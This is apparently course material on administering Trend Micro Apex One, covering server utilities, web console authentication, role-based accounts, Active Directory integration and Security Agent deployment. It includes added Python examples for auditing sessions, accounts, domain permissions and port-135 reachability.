The Apex One Server Migration Tool is a tool that helps you to move the Apex One settings or
configuration from one Apex One server to another.

This utility (ServerMigrationTool.exe) is located in the following folder on the Apex One
Server:
...\PCCSRV\admin\Utility\ServerMigrationTool

ServerProtect Normal Server Migration Tool


The ServerProtect Normal Server Migration Tool is a tool that helps migrate computers running
Trend Micro ServerProtect Normal Server to the Security Agent.

This utility (SPNSXfr.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\SPNSXfr


Server Tuner
Use Server Tuner to optimize the performance of the Apex One Server using parameters for
server-related performance issues, including downloads and network traffic.

This utility (SvrTune.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\SvrTune

Apex One VDI Pre-Scan Template Generation Tool


Use the Apex One VDI Pre-Scan Template Generation Tool to optimize on-demand scans or remove
GUIDs from base or golden images. This tool scans the base or golden image and certifies the image.
When scanning duplicates of this image, Apex One only checks parts that have changed. This ensures
shorter scanning time.

This utility (TCacheGen.exe or TCacheGen_x64.exe) is located in the following folder on the Apex
One Server:
...\PCCSRV\admin\Utility\TCacheGen

System Health Validator


This utility is required to support Network Access Protection (NAP) in Apex One.

This utility (OfficeScanNAPSAV_x64.exe) is located in the following folder on the Apex One
Server:
...\PCCSRV\admin\Utility\SystemHealthValidator

Trend Micro Vulnerability Scanner


The Vulnerability Scanner checks the presence of security software on host machines and can install
the Security Agent to unprotected host machines.

This utility (TMVS.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\TMVS

Cache Generator
This utility is used as part of the gold image creation process. Any machine provisioned from this gold
image will be able to assign itself a new GUID upon boot up. The standard user will not have to do
anything related to Apex One on their machine.

This utility (TCacheGen_x64.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\TCacheGen


Touch Tool
The Touch Tool synchronizes the time stamp of one file with the time stamp of another file or with
the system time of the computer. If you unsuccessfully attempt to deploy a hot fix on the Apex One
server, use the Touch Tool to change the time stamp of the hot fix. This causes Apex One to interpret
the hot fix file as new, which makes the server attempt to automatically deploy the hot fix again.

This utility (TMTouch.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\Touch

Decrypt Tool
To prevent quarantined infected files from being opened, Apex One encrypts a file before quarantining
it or when backing it up before cleaning. Apex One provides a tool that decrypts and then
restores the file in case you need to retrieve information from it.

This utility (VSEncode.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\VSEncrypt


Lesson 3: Trend Micro Apex One Web Management Console

Lesson Objectives:

After completing this lesson, participants will be able to:


• Complete administrative tasks through the Apex One Web Management console
• Describe the steps in the Web Management console login process
• Create new roles and user accounts
• Import user accounts from Active Directory

The Apex One Web Management console allows administrative users with the appropriate permissions to
manage policies, computers and system settings through a Web-based interface. Administrative users
authenticate to the Apex One Web Management console through a supported browser, and click the
appropriate menu and interface components to perform system operations.

The Apex One Web Management console is the central point for monitoring Apex One throughout the
corporate network. The console comes with a set of default settings and values that you can configure
based on your security requirements and specifications. The Web Management console uses standard
Internet technologies, such as JavaScript, CGI, HTML, and HTTPS.


Some of the administrative tasks completed in the Web Management console include:
• Deploying and managing Security Agents installed on networked endpoints
• Grouping Agents into logical domains for simultaneous configuration and management
• Setting scan configurations and initiating manual scan on a single or multiple networked
endpoints
• Configuring notifications about security risks on the network and viewing logs sent by Agents
• Configuring outbreak criteria and notifications
• Delegating Web Management console administration tasks to other Apex One administrators by
configuring roles and user accounts
• Ensuring that Agents comply with security guidelines

Logging into the Web Management Console


The credentials used by the default root administrator are assigned during the Apex One Server setup
process.

This default user account called root cannot be deleted using the Web Management console.

Upon first login, it is the responsibility of the root user to define user roles and set up user accounts to
allow other administrative users to access the Web Management console without using the root account.

In a supported Web browser, type one of the following in the address bar based on the type of Apex One
server installation.
• With SSL on a default site:
https://<Apex One server FQDN or IP address>/officescan
• With SSL on a virtual site:
https://<Apex One server FQDN or IP address>:<port number>/officescan

Alternately, the Web Management console can be accessed on the Apex One Server itself by clicking the
Apex One Web Management console link in the Trend Micro Apex One Server program group in the
Windows Apps list.


Web Management Console Communication


The Web Management console communicates with the Apex One Server over HTTPS at the server
port using CGI programs. The Web Management console CGIs are unique to the communication made
between the console and the Apex One Web server. A specific command handler responds to CGI
requests sent from the Web Management console.
Figure: Web Management console communication. Remote host: Apex One Web Management console
(in browser). Apex One Server host: IIS, Apex One ISAPI/CGI, Apex One Master Service, dbserver.exe,
Database.

Note: The Web Management console does not support Windows 8, 8.1, or Windows Server 2012 in
Windows UI mode.

The Web Management console invokes CGIs to display Agent information, respond to Agent requests
and install Agents remotely. There are two types:
• Administration CGIs: These are used to display information on the Web Management console
and to respond to Agent requests. These are stored in:
…\PCCSRV\Web_OSCE\Web_console\CGI
• Remote Install CGIs: These are used to deploy Security Agents as part of remote installation
functionality. These are stored in:
...\PCCSRV\Web_OSCE\Web_console\RemoteInstallCGI

Login Process
The steps involved in the Web Management console login include the following:

Figure: Web Management console login. Components: Apex One Web Management console (in browser), IIS, Apex One ISAPI/CGI, Apex One Master Service, database. Steps:
1. Login request
2. Parse cookies to determine previous login
3. Account verification
4. Role-based authentication
5. Result

Certificate warnings
Since the digital certificate created during the Apex One Server setup process is self-signed,
browsers may not recognize the digital signature applied to the certificate by the Apex One Server
and a certificate warning will be displayed when administrators log into the Apex One Web
Management console.

To access the console without security warnings, import the self-signed certificate of the Apex One
Server into the Trusted Root Certification Authorities > Registry store on the administrative user's
computer. Before importing it, confirm that its thumbprint matches the certificate on the server:
anything signed by a certificate in that store is trusted by the workstation, so an attacker who
could substitute the certificate in transit would gain that trust as well.

Alternately, replace the self-signed certificate and its private key with a new key pair whose public
portion is submitted, as a certificate signing request, to a trusted commercial certification authority.

Timeout Mechanism
The Web Management console timeout mechanism revolves around a session file created in the
following folder:
…\PCCSRV\TEMP

Session files are named *.key_xxxxxx, where xxxxxx represents a series of random numbers.
The Apex One Server creates this file each time a user logs on successfully.

Note: The inability to create this file will cause the Web Management console to always time-out even
during the login phase.

Go to Administration > Settings > Web Console to configure the required timeout settings. Select
Automatically log off inactive users to enable the Apex One server to log off users after a period of
inactivity (in minutes).
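The session mechanism above is the first thing to inspect when the console logs users off immediately. The following is an added example, not Apex One code: it lists session files in a folder, reports the ones idle longer than the configured timeout, and probes whether a new session file can be created at all, which is the failure the note describes. It assumes the files keep the *.key_<digits> naming and that a session file's modification time reflects its last use; both are assumptions for illustration, and the demo runs in a throwaway temporary folder rather than the real ...\PCCSRV\TEMP.

```python
# Added example (not Apex One code): troubleshooting checks for the console
# session files. Assumptions for illustration: names match *.key_<digits> and a
# file's mtime tracks the last request of that session.
import os
import re
import tempfile
import time
from pathlib import Path

SESSION_NAME = re.compile(r".+\.key_\d+$")


def session_files(temp_dir):
    """Session files present in the folder (one per successful login)."""
    return sorted(p for p in Path(temp_dir).iterdir()
                  if p.is_file() and SESSION_NAME.match(p.name))


def stale_sessions(temp_dir, timeout_minutes, now=None):
    """Session files idle for longer than the console timeout setting."""
    now = time.time() if now is None else now
    cutoff = now - timeout_minutes * 60
    return [p for p in session_files(temp_dir) if p.stat().st_mtime < cutoff]


def can_create_session_file(temp_dir):
    """If the server cannot write here, the console times out even at login."""
    try:
        fd, name = tempfile.mkstemp(prefix="probe.key_", dir=temp_dir)
        os.close(fd)
        os.remove(name)
        return True
    except OSError:
        return False


def demo():
    """Build a throwaway folder with one fresh and one idle session file
    (constructed data) and run the three checks against it."""
    with tempfile.TemporaryDirectory() as folder:
        now = time.time()
        fresh = Path(folder, "a1b2.key_123456")
        idle = Path(folder, "c3d4.key_654321")
        fresh.write_text("session")
        idle.write_text("session")
        os.utime(idle, (now - 3600, now - 3600))   # last touched an hour ago
        Path(folder, "notes.txt").write_text("ignored")  # not a session file
        return (
            [p.name for p in session_files(folder)],
            [p.name for p in stale_sessions(folder, 30, now)],
            can_create_session_file(folder),
        )


if __name__ == "__main__":
    print(demo())
    # Real use on the server: stale_sessions(r"C:\...\PCCSRV\TEMP", 30)
```

Run can_create_session_file against the real TEMP folder under the identity the web server runs as; a False result points at folder permissions rather than at the timeout setting.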

Automatic Refresh
The Web Management console can also be configured to automatically refresh the display of data.
Click Automatically refresh the web console to enable the refresh screen data at the specified
frequency (in seconds).

Active Directory Integration


Apex One can be integrated with an existing Microsoft Active Directory structure to manage Security
Agents more efficiently, assign Web Management console permissions using Active Directory accounts,
and determine which Agents do not have security software installed.

All users in the network domain can have secure access to the Apex One Web Management console. You
can also configure limited access to specific users, even those in another domain. The authentication
process and the encryption key provide validation of credentials for users.

Active Directory integration allows you to take full advantage of the following features:
• Role-based administration: Assign specific administrative responsibilities to users by granting
them access to the Web Management console using their Active Directory accounts.
• Custom Agent groups: Use Active Directory or IP addresses to automatically group Agents and
map them to domains in the Security Agent tree.
• Outside server management: Ensure that computers in the network that are not managed by the
Apex One Server comply with your company's security guidelines.

To integrate the Apex One Server with Active Directory, click Administration > Active Directory > Active
Directory Integration. Provide the details of the Active Directory domain and click Save and Synchronize.

If required, click Specify Domain Credentials to provide a username and password for domain
synchronization

Apex One Active Directory Integration Service


The Apex One Server relies on the Apex One Active Directory Integration Service to interface with
the Active Directory infrastructure. This service appears in the Windows service list.

Authenticating Administrative Users From Active Directory


The steps involved in authenticating administrative users with identities stored in Active Directory
include the following:

Figure: authenticating an Active Directory administrator. Components: Apex One Web Management console (in browser); on the Apex One Server, IIS, Apex One ISAPI/CGI, Apex One Master Service and the Apex One Active Directory Integration Service; and the Active Directory server. Steps:
1. Login request
2. Account verification
3. Identify Active Directory account
4. Request Active Directory authentication
5. Query Active Directory
6. Result, returned back along the same path

Steps 1 and 2 are identical to how native Apex One accounts are processed. The difference arises
when the Apex One Server detects that the account is an Active Directory account, as shown in Step
3.

When the Apex One Server detects that an Active Directory account is being used, it passes
authentication responsibility to the Apex One Active Directory Integration Service, which then
interfaces with the Active Directory server to verify the password provided.

If the account passes authentication, the Role-Based Administration process begins.

Administrative Accounts
In addition to the root account, additional administrative accounts or Active Directory accounts can be
added through the Apex One Web Management console.

Administrative accounts grant and control access to the Apex One Web Management console. If there
are several Apex One administrators in your organization, you can use this feature to assign specific
Web Management console privileges to the administrators and present them with only the tools and
permissions necessary to perform specific tasks. You can also control access to the Agent tree by
assigning them one or several domains to manage. In addition, you can grant non-administrators view
only access to the Web Management console.

Each user (administrator or non-administrator) is assigned a specific role. A role defines the level of
access to the Web Management console. Users log on to the Web Management console using custom
user accounts or Active Directory accounts.

Role-based administration involves the following tasks:
• Defining user roles
• Configuring user accounts and assigning a particular role to each user account

The following activities related to administrative user access to the Web Management console are logged:
• Logging in to the Web Management console
• Modifying an administrative user password
• Logging off from the console
• Session timeout (user is automatically logged off)

Defining User Roles


Define and assign user roles to limit the access specific user accounts have to certain Web
Management console screens. You can define user roles to completely hide Web Management
console screens, limit access to Read Only, or grant full configuration rights.

Built-in Roles

A default Apex One installation includes two built-in roles:

Administrator: Delegate this role to other Apex One administrators or users with sufficient
knowledge of Apex One. Users with this role have Configure permissions to all menu items.

Guest User: Users with this role have View permissions to all menu items except:
• Plug-ins
• Administration > Account Management > User Roles
• Administration > Account Management > User Accounts

Custom Roles

New custom user roles can be created if the available built-in roles do not satisfy the
requirements.

To create a custom role, click Add, and complete the Role Information and Role Permissions
sections.

• Click Menu items for Servers/Agents to specify permissions for menu settings for all servers
and Agents, regardless of the selected domain.
• Click Menu items for Managed Domains to specify permissions for menu settings in domains
configured in the Agent Tree Scope.

Importing Roles

If you have saved custom roles from a different Apex One server and want to use these roles in
the current Apex One server, export the roles and import them into the current server. A *.dat
file containing the custom roles is used to transfer the role details. Consider the following
when importing roles from another server:
• User Roles will be overwritten if you import a role with the same name.
• Importing roles can only be done between Servers that have the same version.
• A role imported from another Apex One Server retains the permissions for menu items
for Servers/Agents and menu items for managed domains.
• A role imported from another Apex One server applies the default permissions for Agent
Management menu items. On the other server, record the role's permissions for Agent
Management menu items and then re-apply them to the role that was imported.

Configuring User Accounts


Configure a user account or use Active Directory accounts to assign permissions to view or
configure the granular Agent settings, tasks, and data that are available in the Agent tree. You must
assign a particular role to each user, which determines the Web Management console menu items
that the user can view or configure. You can use Apex One user accounts to perform single sign-on
to Apex One from the Apex Central console.

A root account is created as part of the Apex One Server setup process and is assigned the built-in
Administrator role.

Adding Apex One Accounts

To create an Apex One account, go to Administration > Account Management > User Accounts
and click Add. Complete the details for the account, making sure to select an appropriate Role
from the list.

Importing Active Directory Accounts

Apex One administrators have the option to log on to the console using Active Directory
credentials. Both Active Directory users and groups can be used. The account and its assigned
permissions exist in the Apex One database, but the login credentials remain in Active
Directory.

Apex One administrators can import Active Directory accounts which in turn creates an Apex
One account that is designated as an Active Directory account. Use Search to locate the Active
Directory user who will become an administrator, add to the Selected Users and Groups list and
click Next.

Select the Agent Tree Scope to define the branches of the Agent Tree this administrator will
have control over and click Next.

The new user account is displayed.

Accounts created by importing an Active Directory account also create a corresponding entry in
TrendAuthDef.xml file located in ...\PCCSRV\Private\AuthStore.

Note the following about imported accounts:


• Only the login name, full name of the user and Active Directory domain of which the
account is a part are recorded.
• Password information for the Active Directory account is not stored. As a result, the
password parameter is blank.
• The key account identifier is the WinUser parameter. If this is set to 1, then this is an
Active Directory user. A 0 would indicate that it is a native Apex One account.
• The SID for this account corresponds to the Active Directory account's SID. Apex One
accounts, on the other hand, use a locally generated number.

Note: Since the passwords for Active Directory administrators are not under the control of Apex One,
any password changes for these administrators must be performed through the Active Directory
tools.
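The properties listed above (blank password, the WinUser flag, the SID) are what an administrator reviewing the authentication store would check. The following is an added example and not Trend Micro code: it parses account entries with those parameters and flags entries whose shape contradicts the description, such as a native account with a blank password. The element and attribute names in the sample are an assumption made for illustration, since the real TrendAuthDef.xml layout is not shown on this page; adapt them to the actual file before use.

```python
# Added example (not Trend Micro code): audit account entries of the kind the
# text describes. The <Account> element and its attribute names are an assumed
# layout for illustration; the real TrendAuthDef.xml may differ.
import xml.etree.ElementTree as ET

# Constructed sample in the assumed layout.
SAMPLE_XML = """<?xml version="1.0"?>
<AuthStore>
  <Account LoginName="root" FullName="Root Administrator" Domain=""
           Password="{hash-placeholder}" WinUser="0" SID="10001" Role="Administrator"/>
  <Account LoginName="jdoe" FullName="Jane Doe" Domain="CORP"
           Password="" WinUser="1" SID="S-1-5-21-1111-2222-3333-1105" Role="Administrator"/>
  <Account LoginName="auditor" FullName="Read-only Auditor" Domain=""
           Password="" WinUser="0" SID="10002" Role="Guest User"/>
</AuthStore>
"""


def parse_accounts(xml_text):
    """Return one dict per <Account> element (assumed layout)."""
    accounts = []
    for node in ET.fromstring(xml_text).iter("Account"):
        accounts.append({
            "login": node.get("LoginName", ""),
            "domain": node.get("Domain", ""),
            "password": node.get("Password", ""),
            "win_user": node.get("WinUser") == "1",   # 1 = Active Directory account
            "sid": node.get("SID", ""),
            "role": node.get("Role", ""),
        })
    return accounts


def audit(accounts):
    """Flag entries whose shape contradicts what the text says about imported
    Active Directory accounts versus native Apex One accounts."""
    findings = []
    for acct in accounts:
        if acct["win_user"]:
            # Credentials for AD accounts stay in AD; nothing should be stored here.
            if acct["password"]:
                findings.append((acct["login"], "AD account carries stored password data"))
            # Domain accounts carry a domain SID of the form S-1-5-21-<domain>-<RID>.
            if not acct["sid"].startswith("S-1-5-21-"):
                findings.append((acct["login"], "AD account without a domain SID"))
            if not acct["domain"]:
                findings.append((acct["login"], "AD account without a domain name"))
        elif not acct["password"]:
            # A native account is authenticated by Apex One itself, so a blank
            # password parameter would mean an account with no secret at all.
            findings.append((acct["login"], "native account with blank password"))
    return findings


def summarize(accounts):
    """Counts that help spot administrator sprawl during a review."""
    return {
        "total": len(accounts),
        "active_directory": sum(1 for a in accounts if a["win_user"]),
        "administrators": sum(1 for a in accounts if a["role"] == "Administrator"),
    }


if __name__ == "__main__":
    accts = parse_accounts(SAMPLE_XML)
    print(summarize(accts))
    for login, problem in audit(accts):
        print(f"{login}: {problem}")
```

Because the file sits under ...\PCCSRV\Private, read it with the same care as any credential store: copy it to the reviewing workstation over an authenticated channel and do not leave copies behind.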

Domain permissions
When defining permissions for domains, Apex One automatically applies the permissions for a
parent domain to all the subdomains that it manages. A subdomain cannot have lesser permissions
than its parent domain. For example, if the System Administrator has permission to view and
configure all Agents that Apex One manages (the Apex One Server domain), the permissions for the
subdomains must allow the System Administrator access to these configuration features. Removing
a permission on a subdomain would mean that the System Administrator does not have full
configuration permissions for all Agents.
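The parent-to-subdomain rule above is easy to state and easy to get wrong when a role covers many branches of the Agent tree. The following is an added example, not Apex One code: it models a tree of domains with a permission level on each, reports every subdomain that carries less than its parent, and shows the downward propagation the text describes. The domain names in the sample tree are constructed for illustration.

```python
# Added example (not Apex One code): a model of the rule that a subdomain in
# the Agent tree cannot carry fewer permissions than its parent domain, with a
# checker and a propagation step that raises subdomains to the parent's level.

# Permission levels for a console menu item, least to most access.
LEVELS = {"Hide": 0, "View": 1, "Configure": 2}

# Constructed sample Agent tree: {domain: (permission, [subdomains])}.
# Domain names are illustrative and not taken from any real installation.
SAMPLE_TREE = {
    "Apex One Server": ("View", ["Workstations", "Servers"]),
    "Workstations": ("Configure", ["Finance", "HR"]),
    "Finance": ("View", []),        # lower than parent Workstations (Configure)
    "HR": ("Configure", []),
    "Servers": ("View", ["DMZ"]),
    "DMZ": ("Hide", []),            # lower than parent Servers (View)
}


def find_violations(tree, root):
    """Return (subdomain, parent, subdomain_level, parent_level) for every
    subdomain whose permission is lower than its parent's."""
    violations = []
    stack = [root]
    while stack:
        name = stack.pop()
        level, children = tree[name]
        for child in children:
            child_level = tree[child][0]
            if LEVELS[child_level] < LEVELS[level]:
                violations.append((child, name, child_level, level))
            stack.append(child)
    return violations


def propagate(tree, root):
    """Apply a parent's permission downward: every subdomain is raised to at
    least its parent's level. Returns a new tree; the input is left unchanged."""
    fixed = {name: (perm, list(subs)) for name, (perm, subs) in tree.items()}
    stack = [root]
    while stack:
        name = stack.pop()
        level, children = fixed[name]
        for child in children:
            child_level, grandchildren = fixed[child]
            if LEVELS[child_level] < LEVELS[level]:
                fixed[child] = (level, grandchildren)   # raised level flows on to its own children
            stack.append(child)
    return fixed


if __name__ == "__main__":
    for child, parent, child_level, parent_level in find_violations(SAMPLE_TREE, "Apex One Server"):
        print(f"{child}: {child_level} is lower than parent {parent} ({parent_level})")
    repaired = propagate(SAMPLE_TREE, "Apex One Server")
    print("violations after propagation:", find_violations(repaired, "Apex One Server"))
```

The security consequence runs in one direction only: granting Configure on a parent domain silently grants it on every subdomain, so scope a role to the narrowest branch that still covers the Agents it must manage.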

Recovering From Forgotten Passwords


The Password Reset Tool (OSCEResetPW.exe) resets the password of the root administrator. The tool
requires the person running it to authenticate with Windows administrator credentials on the Apex One
Server. Locate the tool at the following location:
...\PCCSRV\Admin\Utility\OSCEResetPW

Run OSCEResetPW.exe, log in with your Windows administrator credentials and assign a new password to
the root administrator account.

Because any Windows administrator on the Apex One Server host can reset the root password this way,
administrative rights on that host are equivalent to full control of Apex One and should be granted as
sparingly as the root account itself.

Lesson 4: Security Agents

Lesson Objectives:

After completing this lesson, participants will be able to:


• Describe the responsibilities of the Security Agent
• Describe the Security Agent services and components
• Install and uninstall Security Agents on endpoint computers
• Migrate from other security products
• Define Reference Servers
• Configure Security Agent settings
• View the status of Security Agents
• Configure Security Agent self-protection
• Grant user privileges to modify Security Agent settings

Security Agent Tasks


Security Agents are the protection-tier component of an Apex One environment. The Agent is
responsible for protecting hosts from malware, network threats, and Web threats. The Agent sends
events (such as virus/malware detection) and status information (for example, completion of an update,
Agent shutdown etc.) to the Apex One Server in real time.

Security Agents provide the following protection on endpoint computers:


• Conventional and SmartScan virus protection
• Grayware/Spyware protection
• Device control
• Firewall
• Outbreak prevention
• Smart Protection
• Behavior monitoring
• Data loss prevention
• Suspicious connection service
• Web threat protection
• Predictive Machine Learning protection
• Sample submission
• Memory scanning
• Browser Exploit protection
• Vulnerability protection
• Application Control protection

Security Agent Services and Components


The following services and components are installed as part of the Security Agent.

Apex One NT Listener Service (TmListen.exe)
Receives commands and notifications from the Apex One Server and is responsible for:
• Server-Agent communication
• Updates
• Component startup
• Log delivery

Apex One NT Real-time Scan Service (Ntrtscan.exe)
Performs manual, on-demand and real-time scanning using the following scan engines:
• Virus Scanning API (VSAPI)
• Spyware Scanning API (SSAPI)
• Damage Cleanup Engine (DCE)
• Advanced Threat Scanning Engine (ATSE)
• iCRC modules
This service also starts the Unauthorized Change Prevention Service (TMBMSRV.exe).

Apex One NT Firewall Service (TmPfw.exe)
Provides packet-level firewall, network virus scanning, and intrusion detection capabilities. Through
the Web Management console, administrators can create rules and apply them to filter connections (for
example, by application, IP address, port number, or protocol).

Trend Micro Unauthorized Change Prevention Service (TMBMSRV.exe)
Protects the Apex One registry settings from unauthorized changes and prevents Apex One processes and
services from being stopped. This service is also responsible for:
• Behavior Monitoring
• Device Control
• Certified Safe Software Service

Apex One Common Client Solution Framework (TmCCSF.exe)
Provides a pluggable platform for new Trend Micro core technologies, including:
• Browser Exploit Prevention, which checks the behavior of web pages in real time to detect
malicious scripts and/or programs
• Behavior-based, enhanced memory scanning
• Advanced Threat Scan Engine DLL and Predictive Machine Learning

Trend Micro Endpoint Sensor Service (TMESC.exe)
Provides integrated endpoint sensor capabilities.

Trend Micro Application Control Agent Service (TMiACAgentSvc.exe)
Provides application and device control capabilities.

Trend Micro Vulnerability Protection Service (iVPAgent.exe)
Provides integrated vulnerability protection. This service detects Intrusion Prevention rule
violations and automates the application of virtual patches.

Trend Micro Advanced Threat Assessment Service (AtasAgent.exe)
Identifies potentially compromised endpoints through on-demand assessment and monitoring. Through
integration with Trend Micro Threat Investigation Center, it allows administrators and information
security experts to perform forensic tasks on endpoints for remote incident response.

Apex One Security Agents use the following non-service applications to provide additional functionality.

Apex One NT Monitor (PccNTMon.exe)
Provides the user-interactive components of the Apex One Security Agent and is responsible for:
• Starting the Security Agent console (PccNt.exe)
• Displaying the Security Agent icon in the system tray
• Sending quarantined files to the Apex One Server
• Detecting Internet Explorer proxy settings

Configuration Repositories
Security Agent configuration settings are stored in the following locations:
• Windows Registry: The Registry serves as the main repository for Security Agent settings on
Windows, including:
- Scan settings
- Agent-Server communication settings
- Web threat functionality settings
- Firewall settings
- Location awareness settings
• plist (Mac Agents): Mac Security Agent settings are stored in the macOS plist file.
• ous.ini: Contains information about alternative update sources that a Security Agent can use
• ofcscan.ini: Contains global Agent settings. Security Agents download this file from the
Server to obtain initial configuration settings
• GetServer.ini: Contains information regarding the Apex One Server when the Agent is
roaming.
• ssnotify.ini: Contains information related to existing Smart Protection Servers. Every time a
new Smart Protection Server becomes available for the Agent to choose from, it will be added to
this file.

Security Agent Tree


The Security Agent tree displays all the Agents grouped into domains that the Server currently manages
and allows you to simultaneously configure, manage, and apply the same configuration to all domain
members.

The Security Agent tree icons display the type of endpoint and the status of Security Agents that Apex
One manages.

Above the Agent tree are menu items that allow administrators to perform specific tasks, such as
configuring Agent settings or initiating Agent tasks. To perform any of the tasks, select the task target
and then select a menu item. Alternately, menu items can be accessed by right-mouse clicking items in
the tree, such as the tree root, domains, groups or individual computers.

Deleting the Agent from the Agent tree does not remove the Security Agent from the Agent endpoint.
The Security Agent can still perform Server-independent tasks, such as updating components. However,
the Server is unaware of the existence of the Agent and will therefore not deploy configurations or send
notifications to the Agent.

Security Agent System Requirements


The Security Agent can be installed on computers running Microsoft Windows or Mac platforms.

Platform                                  OfficeScan XG  OfficeScan XG SP1  Apex One
Windows XP                                √              √                  x
Windows 7 (SP1 required for Apex One)     √              √                  √
Windows 8                                 √              √                  x
Windows 8.1                               √              √                  √
Windows 10                                √              √                  √
Windows Server 2003                       √              √                  x
Windows Server 2008                       √              √                  x
Windows Server 2008 R2                    √              √                  √
Windows Server 2012                       √              √                  √
Windows Server 2012 R2                    √              √                  √
Windows Server 2016                       √              √                  √
Windows Server 2019                       x              x                  √
OS X Mavericks 10.9                       √              √                  √
OS X Yosemite 10.10                       √              √                  √
OS X El Capitan 10.11                     √              √                  √
macOS Sierra 10.12                        √              √                  √
macOS High Sierra 10.13                   √              √                  √
macOS Mojave 10.14                        x              x                  √

Hardware Requirements
• Processor:
- 300 MHz Intel Pentium or equivalent (Windows 7, 8.1, 10 family); Intel Core processor for Mac
- 1.0 GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent (Windows Embedded POSReady 7)
- 1.4 GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent (Windows Server 2008 R2,
Windows Server 2016 family, Windows Server 2019 family)
• Memory:
- 512 MB minimum (2.0 GB recommended) with at least 100 MB exclusively for Apex One (Windows
Server 2008 R2, 2012 family)
- 1.0 GB minimum (2.0 GB recommended) with at least 100 MB exclusively for Apex One (Windows 7
(x86), 8.1 (x86), Windows Embedded POSReady 7, 10 (x86) family)
- 2.0 GB minimum (4.0 GB recommended) with at least 100 MB exclusively for Apex One (Windows 7
(x64), 8.1 (x64), 10 (x64) family)
- 512 MB minimum for Apex One on Mac
• Disk Space: 1.5 GB minimum (3 GB recommended) for Windows; 300 MB minimum for Mac

Installing Security Agents


There are several installation methods available for Security Agent deployment. Factors which can
affect the selection of the installation method used by your organization can include:
• The method used in the organization to deploy new endpoint computers (for example, are
endpoint computers based on a golden image, or a scripted mechanism)
• The method used to distribute new software (for example, are new applications deployed
automatically using SCCM, Active Directory policies, or installed by the end user)
• The network bandwidth available during the deployment
• Administrator preference
• The operating system used on the endpoint computer

Security Agent Deployment Prerequisites


Ensure that the following prerequisites are met before attempting to install a Security Agent using
one of the methods described below:
• Communication with the Apex One Server is available
• Administrative privileges on the endpoint, which are required to install software
• No registry keys left on the endpoint by a previous installation
• The endpoint can access the UNC path of the Apex One installation folder (for Remote, Web, or
AutoPcc installs)
• If an existing antivirus application is present, it must be one that Apex One can remove
automatically
• File and Printer Sharing must be allowed as an exception in the Windows Firewall (for some methods)
• The Remote Registry service must be enabled (for some methods)

Remote Installation
This method installs a Security Agent remotely from the Apex One Server Web Management console
page. This method can be used if the Apex One Server has been installed on one of the following
platforms:
• Windows Server 2012 with IIS 8.0
• Windows Server 2012 R2 with IIS 8.5
• Windows Server 2016 with IIS 10
• Windows Server 2019 with IIS 10

The Agent can be installed from Agents > Remote Installation in the Apex One Web Management
console.

Remote installation requires that File and Printer Sharing be excluded from the Windows Firewall
and that the Windows Remote Registry service be running.

Note: Remote installation does not install the Security Agent on endpoints running an Apex One
Server.

Unmanaged Endpoints
In an on-premise installation, the Agent can be installed from Assessment > Unmanaged Endpoints. In
this example, unmanaged endpoints in Active Directory are displayed after using Define Scope and
selecting a branch in the Directory tree.

To use Unmanaged Endpoints, ensure that the Apex One Server computer is part of the network and
can query Active Directory domains or IP addresses. With this feature, administrators can check for
computers with the following status:
• Security Agents within the network domains but managed by another Apex One Server
• Computers without Security Agents installed
• Unreachable computers that cannot connect to a specific checking port (the default port
value is 135)
• Computers within the Active Directory domain but Apex One Server is unable to determine
their security status

For the first two categories listed above, the Apex One Server attempts to connect to the target
endpoint on port 135 (the RPC endpoint mapper) and sends a request; the endpoint is classified
according to the reply it returns. Endpoint firewalls must therefore allow inbound TCP 135 from the
Apex One Server; scope that rule to the server's address rather than opening the port to the whole
network.
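The reachability test the server performs can be reproduced to find out in advance which endpoints the assessment will report as unreachable. The following is an added example and not Apex One code: a TCP connection attempt to the checking port (135 by default) run against a list of hosts in parallel, plus an offline demonstration on the loopback interface. The host names in the comment are placeholders.

```python
# Added example (not Apex One code): the reachability test the text describes,
# a TCP connection attempt to the checking port, run against a list of hosts.
import socket
from concurrent.futures import ThreadPoolExecutor

CHECK_PORT = 135  # default checking port named in the text (RPC endpoint mapper)


def is_reachable(host, port=CHECK_PORT, timeout=2.0):
    """True if a TCP connection to host:port completes within timeout seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, timed out, unresolvable or unroutable
        return False


def classify(hosts, port=CHECK_PORT, timeout=2.0, workers=32):
    """Split hosts into those that answer on the checking port and those that
    do not. Only the reachable set can be queried for Agent status; the rest
    fall into the 'unreachable' category from the text."""
    result = {"reachable": [], "unreachable": []}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        answers = pool.map(lambda h: is_reachable(h, port, timeout), hosts)
        for host, ok in zip(hosts, answers):
            result["reachable" if ok else "unreachable"].append(host)
    return result


def demo_on_loopback():
    """Offline demonstration: a listener on an ephemeral loopback port is
    reachable; once it is closed the same port refuses connections."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    while_open = classify(["127.0.0.1"], port=port, timeout=1.0)
    listener.close()
    after_close = classify(["127.0.0.1"], port=port, timeout=1.0)
    return while_open, after_close


if __name__ == "__main__":
    print(demo_on_loopback())
    # Real use (needs the network and the server-to-endpoint firewall rule);
    # host names are placeholders:
    # print(classify(["ws01.corp.example", "ws02.corp.example"]))
```

A host that is "unreachable" here but alive on other ports usually has a host firewall without the exception for the Apex One Server; a host that connects but is later reported as unmanaged simply has no Agent.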

Installer Link
This method creates an email message that instructs users on the network to install the Security
Agent by clicking the installer link provided in the email.

AutoPcc
This method uses a script to automate the installation of the Security Agent on unprotected
computers. Endpoints must be part of the domain to be able to use AutoPcc using a Uniform Naming
Convention (UNC) path.

Agent Packager
The Agent Packager utility (clnpack.exe) creates an installation package that you can send to
users using conventional media such as CD-ROM or deployed using Microsoft SMS or Active
Directory. Users run the packaged application on the Agent endpoint to install or upgrade the
Security Agent and update components. Agent Packager is especially useful when deploying the
Security Agent or components to Agents in low-bandwidth remote offices. Security Agents installed
using Agent Packager report to the Server where the package was created.

An Agent package can also be downloaded from the Apex One Server login page, but the
configuration options available are limited.

